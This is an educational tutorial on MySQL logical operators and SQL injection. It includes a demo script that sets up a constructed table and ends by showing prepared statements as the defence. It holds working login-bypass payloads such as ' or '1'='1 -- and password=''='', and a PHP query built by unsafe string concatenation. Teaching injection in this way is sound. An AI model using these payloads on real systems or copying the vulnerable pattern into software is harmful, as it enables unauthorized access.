#### 1. Logical operators

AND: select * from users where uname='huangxifeng' and age>30; select 1 && 2;
OR: select * from users where uname='huangxifeng' or password='abc123';
NOT: select * from users where uname not in('huangxifeng');
XOR: select 1 xor 2; (returns 0: both operands are true, and XOR needs exactly one of them true)

#### 2. Complex logic and how it maps to injection logic

Invariant logic (the appended term leaves the result set unchanged):
select * from users where uid=10003 and uname='admin' and 1=1;
select * from users where uid=10003 and uname='admin' or 1=2;
select * from users where uname='admin'&&!!!!!!!1;

Empty-set logic (the appended term makes the whole condition false):
select * from users where uid=10003 and uname='admin' and 1=2;
select * from users where uid=10003 and uname='admin' and 0=true;
select * from users where uname='admin'&&!1;

Full-set logic (the appended term makes the condition true for every row):
select * from users where uid=10003 and uname='admin' or 1=1;
select * from users where uname='admin' or !!!1;
select * from users where uname='admin' or !!!1=~~2;

Similar forms: !!!2=~~2, ''='', select * from users where uname='admin'&&!!!!!!!1;

Caveat on the `!` forms: in MySQL `!` is a unary operator that binds tighter than `=` and every other comparison operator, and each `!` flips the value, so only the parity of the `!` count matters (`!!1` is 1, `!!!1` is 0). Count them before trusting the labels above: `!!!1` (three) is 0, so `or !!!1` is `or 0`, which leaves the result unchanged rather than returning every row; `&&!!!!!!!1` (seven) is `&& 0`, which empties the result rather than leaving it unchanged; and `!!!1=~~2` parses as `(!!!1)=(~~2)`, i.e. `0=2`, which is false, as is `!!!2=~~2`. An even number of `!`, or parentheses around the comparison (`!(1=~~2)` is 1), gives the intended truthy value. Run `select <expression>;` on the target's MySQL version first and confirm the truth value before embedding the expression in a payload.

#### 3. Bypassing password verification with full-set logic

PHP code (the user-controlled values are concatenated straight into the string, inside single quotes):
$sql="select * from users where uname='".$uname."' and password='".$password."'";
Normal parameters: $uname='huangxifeng', $password='hxfabc'
Result: select * from users where uname='huangxifeng' and password='hxfabc'

Injected parameters (several variants): $uname=' or '1'='1 -- (MySQL requires the space after `--`); and '!!!2=~~'2; And '0'='0; $password='=' (giving password=''=')
Results:
select * from users where uname='' or '1'='1' -- and password='hxfabc'
select * from users where uname='admin' and password=''='';
select * from users where uname='admin' and '0'='0';

Why the second one works: `=` is left-associative, so `password=''=''` is evaluated as `(password='')=''`. For any non-empty stored password the inner comparison yields 0, and `0=''` is true because MySQL casts the empty string to 0 for the numeric comparison, so the password check passes without knowing the password. The first variant instead comments out the password clause entirely, and the third appends a tautology; all three reduce the condition to something the attacker controls.
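The following MySQL script is an added example (not from the original notes) that reproduces sections 2 and 3 end to end: it builds a constructed `users` table, evaluates the logic forms (including the `!` parity and precedence cases) so each truth value can be checked rather than assumed, runs the three injected statements exactly as the PHP concatenation would produce them, and finally issues the same login query as a server-side prepared statement to show the payload being treated as plain data. The database name, rows and passwords are invented for the demo; MySQL 5.7/8.0 syntax is assumed.

```sql
-- Added example, not part of the original post. Table, rows and passwords are constructed.
create database if not exists inj_demo;
use inj_demo;
drop table if exists users;
create table users (
  uid      int primary key,
  uname    varchar(32) not null,
  password varchar(64) not null,
  age      int not null
);
insert into users values
  (10001, 'huangxifeng', 'hxfabc',  35),
  (10003, 'admin',       'S3cret!', 41);

-- 1. Bare truth values. `!` binds tighter than `=`, and every `!` flips the
--    value, so only the parity of the `!` count matters.
select 1 && 2     as and_result,   -- 1
       1 xor 2    as xor_result,   -- 0: both operands are true
       !!1        as even_not,     -- 1
       !!!1       as odd_not,      -- 0
       !!!1=~~2   as as_written,   -- 0: parsed as (!!!1) = (~~2), i.e. 0 = 2
       !(1=~~2)   as negated_cmp,  -- 1: the comparison itself is negated
       ''=''      as empty_eq,     -- 1
       0=''       as zero_eq_empty;-- 1: '' is cast to 0 (this is what password=''='' relies on)

-- 2. Invariant / empty-set / full-set forms against the real table.
select uid from users where uid=10003 and uname='admin' and 1=1;  -- 10003 (invariant)
select uid from users where uid=10003 and uname='admin' or 1=2;   -- 10003 (invariant)
select uid from users where uid=10003 and uname='admin' and 1=2;  -- empty
select uid from users where uname='admin' && !1;                  -- empty
select uid from users where uid=10003 and uname='admin' or 1=1;   -- 10001 and 10003 (full set)
select uid from users where uname='admin' or !!1;                 -- 10001 and 10003 (full set)
select uid from users where uname='admin' or !!!1;                -- 10003 only: odd count, so `or 0`

-- 3. The three injected statements from the PHP example, as concatenation
--    produces them. `-- ` needs the trailing space, and it swallows everything
--    to end of line (including a `;`), so the terminator goes on the next line.
select uid from users where uname='' or '1'='1' -- ' and password='hxfabc'
;                                                              -- 10001 and 10003
select uid from users where uname='admin' and password=''='';  -- 10003: (password='') is 0, 0='' is 1
select uid from users where uname='admin' and '0'='0';         -- 10003

-- 4. Same login query as a server-side prepared statement: the payload is
--    bound as data, so its quotes and comment never reach the SQL parser.
prepare login from 'select uid from users where uname=? and password=?';
set @u = ''' or ''1''=''1'' -- ';   -- the literal string: ' or '1'='1' --
set @p = 'anything';
execute login using @u, @p;         -- empty: no user is literally named that
deallocate prepare login;
```

Run it with `mysql < script.sql` (or paste it into the client) and compare the comments with the actual results. Two practical caveats: MySQL 8.0.17 and later still accept `&&` and `!` but flag them as deprecated synonyms for `AND` and `NOT`, and the `0=''` coercion that makes `password=''=''` succeed is MySQL behaviour, so the same payload does not carry over unchanged to engines with stricter type comparison.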